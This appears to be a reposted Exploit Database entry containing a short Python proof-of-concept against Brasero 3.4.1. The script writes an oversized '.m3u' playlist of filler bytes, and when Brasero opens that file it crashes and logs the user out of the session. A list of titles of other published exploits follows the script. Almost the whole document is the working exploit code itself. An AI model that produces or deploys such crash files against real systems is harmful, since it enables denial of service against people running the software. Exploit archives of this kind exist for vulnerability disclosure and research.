Brasero CD/DVD Burner 3.4.1 – ‘.m3u’ Buffer Overflow Crash (PoC)

Exploit Database
87 阅读

作者： Avinash Thapa

日期： 2015-03-16
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/36388/

#!/usr/bin/python

#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9

buffer ="A"*26109

buffer += "CCCC"

buffer += "D"*10500

file = "crash.m3u"

f = open(file, "w")

f.write(buffer)

f.close()

# After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session.
#####################################################################
# -Acid #
#####################################################################

last Exploits
Brasero CD/DVD Burner 3.4.1 – ‘.m3u’ Buffer Overflow Crash (PoC)的更多信息

Flash Movie Player 1.5 – File Magic Denial of Service：
Optimal Archive 1.38 – ‘.zip’ File (SEH) (PoC)：
Microsoft Excel 2002 – Memory Corruption：
Light Audio Mixer 1.0.12 – ‘.wav’ Crash (PoC)：
Microsoft Windows – ‘nt!NtQueryObject (ObjectNameInformation)’ Kernel Pool Memory Disclosure：
Adobe Flash – Heap Overflow in ATF Processing Image Reading：
Steam Software – Denial of Service：
Crimson Editor – Overwrite (SEH)：